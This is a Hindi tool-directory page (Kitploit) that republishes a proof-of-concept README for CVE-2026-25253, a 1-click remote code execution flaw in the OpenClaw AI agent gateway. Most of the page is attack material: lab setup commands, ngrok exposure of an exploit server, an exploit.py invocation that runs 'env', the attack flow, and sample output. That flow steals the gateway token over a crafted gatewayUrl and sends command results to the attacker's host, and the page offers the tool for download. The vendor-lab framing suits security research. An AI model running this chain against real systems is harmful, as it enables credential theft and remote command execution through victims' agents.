Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-25253 — OpenClaw प्रमाणीकरण टोकन बहिष्करण | Kitploit
उपकरण/GitHubGitHub/eqstlab/cve-2026-25253
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHubeqstlab/cve-2026-25253

CVE-2026-25253

OpenClaw प्रमाणीकरण टोकन बहिष्करण

रिपॉजिटरी देखें
253 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-25253 OpenClaw 1-क्लिक RCE

★ CVE-2026-25253 OpenClaw 1-क्लिक रिमोट कोड एक्जीक्यूशन PoC ★

https://github.com/user-attachments/assets/e6957c61-7549-4e68-831e-a05436504a3e

विवरण

CVE-2026-25253 : OpenClaw प्रमाणीकरण टोकन एक्सफ़िल्ट्रेशन भेद्यता

विवरण: OpenClaw (उर्फ clawdbot या Moltbot) v2026.1.29 से पहले के संस्करण में हमलावरों को एक निर्मित gatewayUrl क्वेरी-स्ट्रिंग मान Control UI में प्रदान करके संग्रहीत गेटवे प्रमाणीकरण टोकन को बाहर निकालने की अनुमति देता है, जो बिना सत्यापन या उपयोगकर्ता पुष्टि के स्वचालित रूप से एक WebSocket कनेक्शन स्थापित करता है। इससे अनधिकृत गेटवे पहुंच और 1-क्लिक रिमोट कोड निष्पादन हो सकता है।

आवश्यकताएँ

  • Docker (विंडोज पर Docker Desktop)
  • Python 3.x (हमला करने वाला पक्ष)

फ़ाइलें

  • Dockerfile — OpenClaw असुरक्षित वातावरण बनाएं
  • templates/ — एक्सप्लॉइट द्वारा उपयोग किए जाने वाले दुर्भावनापूर्ण वेब पेज
  • config.txt — पीड़ित वातावरण में उपयोग किया जाने वाला OpenClaw कॉन्फ़िगरेशन
  • exploit.py — एक्सप्लॉइट सर्वर
  • requirements.txt — PoC निर्भरताएँ
  • पर्यावरण सेटअप

    1. Docker इमेज बनाएं
    root@kitploit:~
    docker build -t openclaw-vuln .
    
    1. पर्यावरण चलाएं (विंडोज)
    root@kitploit:~
    docker run -d --name openclaw-vuln -p 127.0.0.1:2222:22 openclaw-vuln
    
    1. SSH टनल बनाएं
    root@kitploit:~
    ssh-keygen -R [127.0.0.1]:2222
    ssh -N -L 18789:127.0.0.1:18789 -p 2222 [email protected]
    
    • पासवर्ड: openclawlab
    1. OpenClaw Control UI तक पहुंचें ब्राउज़र में निम्न URL खोलें
    root@kitploit:~
    http://127.0.0.1:18789/
    
    1. Gateway Token d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66 दर्ज करें
    2. Connect पर क्लिक करें
    3. Config टैब खोलें
    4. config.txt की सामग्री चिपकाएं
    5. API key फ़ील्ड को अपनी OpenAI API key से बदलें
    6. कॉन्फ़िगरेशन सहेजें
    7. पुष्टि करें कि एजेंट सामान्य रूप से प्रतिक्रिया करता है

    प्रूफ ऑफ कॉन्सेप्ट (PoC)

    1. निर्भरताएँ स्थापित करें (हमला करने वाला पक्ष)
    root@kitploit:~
    pip3 install -r requirements.txt
    
    1. एक्सप्लॉइट सर्वर को HTTPS पर प्रकट करें
    root@kitploit:~
    wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz
    tar xzf ngrok-v3-stable-linux-amd64.tgz
    ./ngrok authtoken YOUR_TOKEN
    ./ngrok http 13337
    
    • उत्पन्न फ़ॉरवर्डिंग होस्टनेम कॉपी करें
    1. एक्सप्लॉइट सर्वर चलाएं
    root@kitploit:~
    python3 exploit.py --host YOUR_NGROK_HOSTNAME --command "env"
    

    उदाहरण:

    root@kitploit:~
    python3 exploit.py --host abcd-1234.ngrok-free.app --command "env"
    
    1. हमला ट्रिगर करें
    1. एक्सप्लॉइट सर्वर द्वारा प्रकट किया गया दुर्भावनापूर्ण पेज खोलें
    2. पेज के साथ पीड़ित के इंटरैक्शन का अनुकरण करें
    3. ब्राउज़र से एक्सप्लॉइट फ्लो ट्रिगर करें

    हमला प्रवाह

    1. एक दुर्भावनापूर्ण URL पीड़ित के Control UI के gatewayUrl को बदलता है
    2. ब्राउज़र स्वचालित रूप से हमलावर-नियंत्रित WebSocket एंडपॉइंट से कनेक्ट होता है
    3. गेटवे प्रमाणीकरण टोकन हमलावर को लीक हो जाता है
    4. दुर्भावनापूर्ण पेज चुराए गए टोकन का उपयोग करके पीड़ित के स्थानीय OpenClaw गेटवे के लिए एक नया WebSocket कनेक्शन खोलता है
    5. एजेंट के माध्यम से एक कमांड निष्पादन अनुरोध भेजा जाता है
    6. निष्पादन परिणाम हमलावर सर्वर पर वापस आ जाता है

    अपेक्षित परिणाम

    • पीड़ित का ब्राउज़र दुर्भावनापूर्ण WebSocket प्रवाह में पुनर्निर्देशित हो जाता है
    • गेटवे प्रमाणीकरण टोकन हमलावर द्वारा कैप्चर किया जाता है
    • हमलावर OpenClaw के माध्यम से एक कमांड निष्पादन अनुरोध भेज सकता है
    • कमांड आउटपुट हमलावर सर्वर पर वापस आ जाता है

    नमूना आउटपुट

    root@kitploit:~
    [*] Exploit Server running on: abcd-1234.ngrok-free.app:13337
    [*] Gateway token captured: d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66
    
    ==================================================
          [!] EXPLOIT RESULT CAPTURED [!]
    ==================================================
    HOSTNAME=openclaw-vuln
    PWD=/root
    HOME=/root
    ...
    ==================================================
    

    नोट्स

    • यह PoC OpenClaw 2026.1.24-1 को लक्षित करता है
    • एक्सप्लॉइट श्रृंखला Control UI में संवेदनशील gatewayUrl हैंडलिंग पर निर्भर करती है
    • दूरस्थ पीड़ित पहुंच के लिए, दुर्भावनापूर्ण पेज को HTTPS पर प्रस्तुत किया जाना चाहिए
    • स्थानीय OpenClaw गेटवे पीड़ित के ब्राउज़र के माध्यम से एक ब्रिज के रूप में पहुंचा जाता है

    EQST अंतर्दृष्टि

    हम महीने में एक बार CVE और मैलवेयर विश्लेषण प्रकाशित करते हैं। यदि आप रुचि रखते हैं, तो कृपया हमारे प्रकाशनों को देखने के लिए नीचे दिए गए लिंक का अनुसरण करें।

    • KR : https://www.skshieldus.com/security-insights/reports/eqst_openclaw_rce_vulnerability
    • EN : https://www.skshieldus.com/en/report?tab=eqst
    टूल डाउनलोड करें